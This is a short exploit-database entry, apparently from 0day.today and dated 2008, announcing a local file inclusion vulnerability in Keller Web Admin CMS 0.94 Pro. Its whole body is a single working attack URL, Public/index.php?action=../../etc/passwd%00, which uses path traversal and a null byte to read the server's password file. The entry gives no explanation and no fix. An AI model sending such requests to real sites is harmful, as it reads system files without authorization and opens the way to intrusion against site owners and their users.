id: 3311
date: 06/25/2008
title: Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st)
author: StAkeR
cves: 

======================================================================
Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st)
======================================================================



@~~===========================================~~@
|  Keller Web Admin <= Local File Inclusion     |
@~~===========================================~~@
| Public/index.php?action=../../etc/passwd%00   |                                
@~~===========================================~~@





#  0day.today [2023-03-22]  #